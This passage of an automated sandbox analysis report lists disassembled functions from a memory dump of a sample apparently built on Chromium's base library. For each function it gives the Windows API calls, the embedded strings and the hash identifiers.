                                                  • Instruction ID: 38f246181df111d5429a8bd68a772e0fce3d181c3253e5a9de7ce3dab65c4b62
                                                  • Opcode Fuzzy Hash: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
                                                  • Instruction Fuzzy Hash: F4B01230240208CFC300DB5DD445C003BFCAF49A0434000D0F1088B731C721FC008A40
                                                  Function 0578019F Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4447654801.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_5780000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c7f09ad65aed1a8c1af9babd5d6887e926364be5b237703938152fd130ebb70
                                                  • Instruction ID: 5c429739808af9b676ee10463e0caeba8ff67bc201420b6fa8d91240a2bc73dd
                                                  • Opcode Fuzzy Hash: 3c7f09ad65aed1a8c1af9babd5d6887e926364be5b237703938152fd130ebb70
                                                  • Instruction Fuzzy Hash: 89A002B7C983044F9B5D8DC0F7931227295E5507AA30645ABDC1C4566AE33655304505

                                                  Non-executed Functions

                                                  Function 00D3CA00 Relevance: 43.6, APIs: 23, Strings: 1, Instructions: 1618COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D3CAA6
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3CADE
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?), ref: 00D3D0C1
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00000060), ref: 00D3D21C
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D3D2AE
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00000060), ref: 00D3D372
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D3D40B
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3D5BD
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3D669
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3D6BE
                                                    • Part of subcall function 00D3BED0: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D3BF17
                                                    • Part of subcall function 00D3BED0: ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,000000FF), ref: 00D3C071
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3D612
                                                    • Part of subcall function 00D3C4B0: TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,00000000,3BE85000,0000000A,DAFC8968,00D3F4F3,00D615E2), ref: 00D3C4CC
                                                    • Part of subcall function 00D3C4B0: AcquireSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D3C4FD
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3E02E
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 00D3E0B9
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3E0F3
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,00000000), ref: 00D3E104
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Release$Acquire
                                                  • String ID: first
                                                  • API String ID: 1021914862-2456940119
                                                  • Opcode ID: d1cf41877ed052223bf9373018924bf1d9d4271d2b6432f792b5bb9dd53f4ab7
                                                  • Instruction ID: 3199e93591d0c6766e05ba7932d8aa03e70d85ae9778bc8a2fd1c026352e8af1
                                                  • Opcode Fuzzy Hash: d1cf41877ed052223bf9373018924bf1d9d4271d2b6432f792b5bb9dd53f4ab7
                                                  • Instruction Fuzzy Hash: D5E2E0726043019FC718CF28D880B6AB7E2FF84314F19866DE9899B392D775ED45CBA1
                                                  Function 00D49830 Relevance: 21.8, APIs: 10, Strings: 2, Instructions: 797COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D49C08
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 00D4A02F
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D4A329
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,00000000,00000000,00004000,?), ref: 00D4A362
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Release$Acquire
                                                  • String ID: A$first
                                                  • API String ID: 1021914862-3078553561
                                                  • Opcode ID: 13f2de96d13cfbac08ed5ed8107d5e70ba0a683aaa5c19e5fb5ae9bba8395ba1
                                                  • Instruction ID: 7af447489ea4cb9f8c9af414e3310641a9a0d61b1dd0f12b4aace30475853977
                                                  • Opcode Fuzzy Hash: 13f2de96d13cfbac08ed5ed8107d5e70ba0a683aaa5c19e5fb5ae9bba8395ba1
                                                  • Instruction Fuzzy Hash: E762F0726043018FD718CF28C894B6AB7E2FF88314F19866DE9898B395D775EC45CBA1
                                                  Function 00CEE6AF Relevance: 21.7, Strings: 17, Instructions: 406COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3333$3333$3333$3333$3333$3333$3333$3333$UUUU$UUUU$UUUU$UUUU$UUUU$UUUU$UUUU$UUUU$UUUU
                                                  • API String ID: 0-3925639157
                                                  • Opcode ID: 5886f80acb38bb4a72f48d7ef223183355da908bd1e2f2f65a90cc3244282943
                                                  • Instruction ID: a01a762cf72bf99a0c188d367c3e6cfc0970bad371fc4b630614da49b81e3eec
                                                  • Opcode Fuzzy Hash: 5886f80acb38bb4a72f48d7ef223183355da908bd1e2f2f65a90cc3244282943
                                                  • Instruction Fuzzy Hash: 0CE120B7F209258BCB54CF5DC88168DB7F2AB9C32072D816AD919F7305D674ED068B80
                                                  Function 00D28D00 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 309fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,?,?,00000000,00000005,?,00000000,?,00000000), ref: 00D28E61
                                                  • GetLastError.KERNEL32 ref: 00D28E71
                                                  • SetLastError.KERNEL32(00000000), ref: 00D28EBA
                                                  • GetLastError.KERNEL32 ref: 00D28F08
                                                  • SetLastError.KERNEL32(00000000), ref: 00D28F41
                                                    • Part of subcall function 00D262C0: GetHandleVerifier.EPIIYF_GAAICB ref: 00D262C9
                                                  • GetLastError.KERNEL32 ref: 00D28F53
                                                  • SetLastError.KERNEL32(00000057,?,00000000), ref: 00D28F69
                                                  • GetLastError.KERNEL32 ref: 00D28FA4
                                                  Strings
                                                  • ..\..\base\files\file_win.cc, xrefs: 00D28D4B
                                                  • ..\..\base\files\file_util_win.cc, xrefs: 00D29051
                                                  • DoInitialize, xrefs: 00D28D50
                                                  • MakeAbsoluteFilePath, xrefs: 00D29056
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateFileHandleVerifier
                                                  • String ID: ..\..\base\files\file_util_win.cc$..\..\base\files\file_win.cc$DoInitialize$MakeAbsoluteFilePath
                                                  • API String ID: 3241317918-3581851084
                                                  • Opcode ID: af942bcf8e42d4ed92c999b8de70446f0f4e1b8cf9344af365c5919d58ddcb87
                                                  • Instruction ID: a0ffccedcc46f231c9115f444e5089f31c346db90b1db57d858a40bade6c4b4e
                                                  • Opcode Fuzzy Hash: af942bcf8e42d4ed92c999b8de70446f0f4e1b8cf9344af365c5919d58ddcb87
                                                  • Instruction Fuzzy Hash: 7CA11471A04310ABD710DF24D886B6AB7E1EFD4364F044A2DF996D7282DB74E944C7B2
                                                  Function 00D342C0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 278timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen$CountLocalTickTime
                                                  • String ID: )] $:$:$UNKNOWN$VERBOSE
                                                  • API String ID: 3535325690-776901039
                                                  • Opcode ID: 6ce668192e14c9b9fb91c8620b33edcc1a9bc5b18592b583f4db3812f356a1f9
                                                  • Instruction ID: 33f434c2a8e5c8062d9dbf1922a646d3e18bb715483a67b53263a11fde384a70
                                                  • Opcode Fuzzy Hash: 6ce668192e14c9b9fb91c8620b33edcc1a9bc5b18592b583f4db3812f356a1f9
                                                  • Instruction Fuzzy Hash: 7E91F5B5E00354AFDB10EBA19C86FAE7BB5AF46704F084428F80577382DB79A905D7B1
                                                  Function 00D269C0 Relevance: 16.6, APIs: 11, Instructions: 127threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00D269F9
                                                  • GetThreadPriority.KERNEL32(00000000), ref: 00D269FC
                                                  • GetCurrentThread.KERNEL32 ref: 00D26A06
                                                  • SetThreadPriority.KERNEL32(00000000,00000002), ref: 00D26A0B
                                                  • QueryPerformanceCounter.KERNEL32(00000000), ref: 00D26A72
                                                  • GetCurrentThread.KERNEL32 ref: 00D26A80
                                                  • SetThreadPriority.KERNEL32(00000000,?), ref: 00D26A8B
                                                  • QueryPerformanceFrequency.KERNEL32(00000000), ref: 00D26AA2
                                                  • __Init_thread_header.LIBCMT ref: 00D26B66
                                                  • __Init_thread_header.LIBCMT ref: 00D26B9F
                                                  • QueryPerformanceCounter.KERNEL32(00000000), ref: 00D26BC9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Thread$CurrentPerformancePriorityQuery$CounterInit_thread_header$Frequency
                                                  • String ID:
                                                  • API String ID: 3595693039-0
                                                  • Opcode ID: 45d49a97d63c26ee2a07e950a22b828871a9c7491dd0f179118c63a1b11e15f0
                                                  • Instruction ID: 132794686995706082d808e4b21501443062636eb34cfb6c9e3c545c0aeead66
                                                  • Opcode Fuzzy Hash: 45d49a97d63c26ee2a07e950a22b828871a9c7491dd0f179118c63a1b11e15f0
                                                  • Instruction Fuzzy Hash: F451AD75808B42DFC300DF34E855A4ABBB5FF95394F40871AF886923A1DB71E890CB22
                                                  Function 00CEE03C Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 533COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OQS_CPU_has_extension.EPIIYF_GAAICB(00000002), ref: 00CEE00E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: U_has_extension
                                                  • String ID: """"$""""$DDDD$DDDD$DDDD$DDDD$UUUU
                                                  • API String ID: 2855587727-881520860
                                                  • Opcode ID: e8b77a87fa7b5bc31f18785d39748b25c1690a91f1e57bcb4d4495b238102481
                                                  • Instruction ID: 0d85886addd08f69d90e9e8f9567a5e0062b84df002f06b484f0259ca92ca1ea
                                                  • Opcode Fuzzy Hash: e8b77a87fa7b5bc31f18785d39748b25c1690a91f1e57bcb4d4495b238102481
                                                  • Instruction Fuzzy Hash: 12023673A043518FD724CF29D8822AAF7E1FFD9314F05856DE999DB242E6309D06CB82
                                                  Function 00D218B0 Relevance: 12.9, APIs: 2, Strings: 5, Instructions: 676COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00DC59A0), ref: 00D218DA
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  Strings
                                                  • __s2 < __s1 || __s2 >= __s1+__n, xrefs: 00D21F82
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h, xrefs: 00D21F8C
                                                  • ..\..\base\trace_event\trace_log.cc, xrefs: 00D221B6
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D21F91
                                                  • char_traits::copy overlapped range, xrefs: 00D21F7D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AcquireExclusiveLock
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\base\trace_event\trace_log.cc$..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h$__s2 < __s1 || __s2 >= __s1+__n$char_traits::copy overlapped range
                                                  • API String ID: 4021432409-1239042244
                                                  • Opcode ID: 5d48084d5d41f9bd52c4df31156aa9dfeadb746ba7e1e1a262837f79689d0ff7
                                                  • Instruction ID: 93f0bcf5494d656d889ff80a399210b4c85e6f19acf15845ae3c997099d41112
                                                  • Opcode Fuzzy Hash: 5d48084d5d41f9bd52c4df31156aa9dfeadb746ba7e1e1a262837f79689d0ff7
                                                  • Instruction Fuzzy Hash: FA42CE75A083559FC720DF24D880BAAB7E5FFE5314F148A1DF89957281DB30E909CBA2
                                                  Function 00D44000 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000001,FFFFFFFF,00000000), ref: 00D4413C
                                                    • Part of subcall function 00D72BFC: IsProcessorFeaturePresent.KERNEL32(00000017,00D7AB04,?,?), ref: 00D72C18
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: FeatureHandleModulePresentProcessor
                                                  • String ID: ..\..\base\native_library_win.cc$GetFileAttributesExFromAppW$PinSystemLibrary$msedge.exe
                                                  • API String ID: 1274991676-3668766867
                                                  • Opcode ID: c35835f7e98e94ef3845ad82f98fcc30e0343aed9a886c88d84b43ce2c6baf62
                                                  • Instruction ID: 56dbe1d61dffb035b5c4c558fa3343029b5dd94d8a9eb3322bc1f8e6e5380009
                                                  • Opcode Fuzzy Hash: c35835f7e98e94ef3845ad82f98fcc30e0343aed9a886c88d84b43ce2c6baf62
                                                  • Instruction Fuzzy Hash: 5291E3706083819BD710CF24C885B2FBBD5AFD4714F584A2CF59687282EB70E989C7B2
                                                  Function 00D487F0 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 373COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D489A4
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,00000000,00000000,00004000,00000000), ref: 00D48B8C
                                                    • Part of subcall function 00D3C4B0: TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,00000000,3BE85000,0000000A,DAFC8968,00D3F4F3,00D615E2), ref: 00D3C4CC
                                                    • Part of subcall function 00D3C4B0: AcquireSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D3C4FD
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48D1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: first
                                                  • API String ID: 1678258262-2456940119
                                                  • Opcode ID: dfdbb394092885ec0c8a294f79bba91b78f1e7f4539078644d7921fc26be4018
                                                  • Instruction ID: dc631976a8f274b93a227f47a48f3137195f4dcd72ab01edfe38d7c338c65779
                                                  • Opcode Fuzzy Hash: dfdbb394092885ec0c8a294f79bba91b78f1e7f4539078644d7921fc26be4018
                                                  • Instruction Fuzzy Hash: 4BE10172A043018FC718CF28C88176AB7E1FF88354F19856DE8899B392DB75ED45DBA1
                                                  Function 00D48D40 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 373COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D48EF4
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,00000001,00000000,00004000,00000000), ref: 00D490DC
                                                    • Part of subcall function 00D3C4B0: TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,00000000,3BE85000,0000000A,DAFC8968,00D3F4F3,00D615E2), ref: 00D3C4CC
                                                    • Part of subcall function 00D3C4B0: AcquireSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D3C4FD
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D4926F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
